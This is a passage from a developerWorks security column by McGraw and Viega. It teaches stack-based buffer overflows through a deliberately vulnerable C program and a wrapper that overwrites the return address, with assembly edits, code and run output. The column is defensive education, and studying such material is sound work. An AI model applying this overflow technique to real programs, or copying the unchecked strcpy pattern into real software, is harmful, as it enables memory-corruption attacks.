	   Lots of labels are in the assembly code, much like switch labels in C. These labels are abstractions for memory addresses you can look at, and jump to. For example, the label concat_arguments is the start of the concat_arguments function. This is where we've been jumping to, until now. If you can read assembly language just moderately well, you'll notice the first thing that happens is the current base pointer is pushed onto the program stack.
	   Search for the line pushl $concat_arguments because it gets the memory address of the label concat_arguments. Instead of looking at the memory address for concat_arguments, we want to look at the memory address of the call to concat_arguments. We'll have to update this line of assembly shortly.
	   Search for the line call concat_arguments because this is the location in the code to which we want to jump.
	

Now we've picked out the important features of the assembly code. Next we need to find a way to get the memory address of the code call concat_arguments. The way to do this is to add a label. Let's change that one line of assembly language to two lines:

JMP_ADDR:
call concat_arguments

Next we need to change the line pushl $concat_arguments to get the address of the label we're interested in:

	pushl $JMP_ADDR

By this point, we've made all the changes to this assembly code we need to make. Save it, then compile it with the following command:

gcc -o concat concat.s

Notice that we're compiling the .s file, and not the .c file this time.

So now if we run concat (or our wrapper), the program will print out the memory address we eventually need to jump to. If we run concat through our wrapper, we will get output much like the following:

[viega@lima bo]$ ./wrapconcat
Entering concat_arguments.
This should happen twice if our program jumps to the right place
i = 1; argc = 2
xxxxxxxxxxxxxxxxxxxxxxxx
0x804859f
Entering concat_arguments.
This should happen twice if our program jumps to the right place
xxxxxxxxxxxxxxxxxxxxxxxx
0x804859f
Segmentation fault (core dumped)

Notice that the memory address is different than it was before. Let's change our wrapper to reflect the new memory address:

#include 
int main()
{
  char* buf = (char *)malloc(sizeof(char)*1024);
  char **arr = (char **)malloc(sizeof(char *)*3);
  int i;
  for(i=0;i<24;i++) buf[i] = 'x';
  buf[24] = 0x9f; /* Changed from 0xd4 on our machine */
  buf[25] = 0x85; /* Changed from 0x84 on our machine */
  buf[26] = 0x4;
  buf[27] = 0x8;
  buf[28] = 0x2;
  buf[29] = 0x00;
  arr[0] = "./concat";
  arr[1] = buf;
  arr[2] = '\0';
  execv("./concat", arr);
}

Now it's time to compile and run the wrapper.

It works! Infinite loop!

But wait -- we're not out of the woods yet. The version of concat we're running has a lot of debugging information in it. It turns out that all our debugging information has caused the code in the main method to move to somewhere it wouldn't otherwise be. What does that mean? Only that if we remove all our debugging code, and try to use our wrapper, we're going to get the following output:

[viega@lima bo]$ ./wrapconcat
xxxxxxxxxxxxxxxxxxxxxxxx
Illegal instruction (core dumped)
[viega@lima bo]$

This output suggests that the code for the function concat_arguments is placed in a lower memory address than the code for main. Apparently, we need to get the real memory address we want to return to. We could get it to work by trial and error. For example, we could try moving the pointer a byte at a time until we get the desired results. We couldn't have removed too many bytes of code, right? But there's an easier way.

Let's take the original concat.c and make a small modification to it:

/* Collect program arguments into a buffer, then print the buffer */
void concat_arguments(int argc, char **argv)
{
  char buf[20];
  char *p = buf;
  int i;
  for(i=1;i<argc;i++)
    {
      strcpy(p, argv[i]);
      p+=strlen(argv[i]);
      if(i+1 != argc)
        {
          *p++ = ' '; /* Add a space back in */
        }
    }
  printf("%s\n", buf);
}
int main(int argc, char **argv)
{
  concat_arguments(argc, argv);
  printf("%p\n", &concat_arguments);
}

Once again we have modified the program to print out the address of concat_arguments. This time, however, we're doing it after the return from concat_arguments in main. Since main is the last function laid out into memory, and since this code comes after the call we're interested in, our change should not affect the memory address of the call. Next, we have to do exactly the same assembly language hack we did before and adjust our wrapper accordingly. This time, we might get the address 0x804856b, which is, as expected, different than the one we had been using. After modifying the wrapper and recompiling it, we can remove the printf from concat and recompile.

When you recompile concat and run the wrapper, you'll notice that everything works as expected. We finally got it right, and hopefully we learned something in the process.


What's next

In this column, we've learned how to smash the stack (ultimately, in order to keep others from doing it). Now all we have to do is figure out how to craft our own attack code, insert it into the program, and jump to it. We'll discuss all this in the next column.


Resources

Related articles in the "Make your software behave" column on developerWorks:
	
	"Preventing buffer overflows": Gary and John show how to protect your code through defensive programming
	"Learning the basics of buffer overflows": Gary and John describe buffer overflow attacks at a high level and discuss why buffer overflows are the single biggest software security threat
	"Assuring your software is secure": Gary and John lay out their five-step process for designing for security
	The first "Make your software behave" column: Gary and John introduce their philosophy of security, and explain why they're focusing on software security issues facing developers	
	

  

About the authors

Gary McGraw is the vice president of corporate technology at Reliable Software Technologies in Dulles, VA.  Working with Consulting Services and Research, he helps set technology research and  development direction. McGraw began his career at Reliable Software Technologies as a Research Scientist, and he  continues to pursue research in Software Engineering and computer security. He holds a dual Ph.D. in Cognitive Science  and Computer Science from Indiana University and a B.A. in Philosophy from the University of Virginia. He has written more than 40 peer-reviewed articles for technical publications, consults with major e-commerce vendors including Visa and the Federal Reserve, and has served as principal investigator on grants from Air Force Research Labs, DARPA, National Science Foundation, and NIST's Advanced Technology Program.
McGraw is a noted authority on mobile code security and co-authored both "Java Security: Hostile Applets, Holes,  & Antidotes" (Wiley, 1996) and "Securing Java: Getting down to business with mobile code" (Wiley, 1999)  with Professor Ed Felten of Princeton. Along with RST co-founder and Chief Scientist Dr. Jeffrey Voas,  McGraw wrote "Software Fault Injection: Inoculating Programs Against Errors" (Wiley, 1998). McGraw regularly contributes to popular trade publications and is often quoted in national press articles.
John Viega is  a Senior Research Associate, Software Security Group
co-founder, and Senior Consultant at Reliable
Software Technologies.  He is the
Principal Investigator on a DARPA-sponsored  grant  for   developing
security    extensions  for standard programming languages.
John has authored over 30 technical publications in the areas of
software security and testing.  He is  responsible for finding several
well-publicized   security  vulnerabilities  in    major  network  and
e-commerce products, including a  recent break in Netscape's security.
He is also  a prominent member of  the open-source software community,
having  written Mailman, the   GNU  Mailing  List Manager, and,   more
recently,  ITS4, a tool for finding  security vulnerabilities in C and
C++ code.  Viega holds a M.S. in Computer Science
from the University of Virginia.

Privacy		Legal		Contact

[an error occurred while processing this directive] [an error occurred while processing this directive]